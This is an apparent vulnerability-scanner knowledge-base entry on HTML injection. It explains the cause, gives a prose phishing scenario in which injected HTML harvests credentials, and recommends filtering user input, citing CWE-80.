HTML Injection

Description

During the scan, Kayran managed to find that an HTML Injection is possible.
This vulnerability occurs when a user’s input is not being correctly validated and the output is not encoded.

A successful HTML Injection will allow the attacker to send malicious HTML pages to a victim.
This could lead to allowing the attacker to change\delete certain things from the site.

A possible attack scenario is demonstrated below :

1. Attacker discovers injection vulnerability and decides to use an HTML based injection attack.
2. He then crafts malicious link, including his injected HTML content, and sends it to a user via email.
3. The user visits the page due to the page being located within a trusted domain.
4. The attacker’s injected HTML is rendered and presented to the user asking for a username and password.
5. The user enters a username and password, which are both sent to the attackers server.

Recommendation

Look for HTML elements in the incoming HTTP stream that contains the user’s input.
Simply remove any HTML-syntax sub strings (like tags and links) from any user-supplied text to prevent these situations.

References

https://cwe.mitre.org/data/definitions/80.html

< Return to all Vulnerabilities

Active Directory Hacking

What does Active Directory mean? The Active Directory infrastructure is a critical infrastructure in most organizations, and it forms the backbone of the organization’s computing

Read More »

HAR Files

In this article, I’ll talk and explain about HAR Files, so if you don’t know what they are, or, what do we use them for,

Read More »

Blue Team

We’ve talked about The Red Team before, but what about The Blue Team? How is this group different from the red one? Why would we

Read More »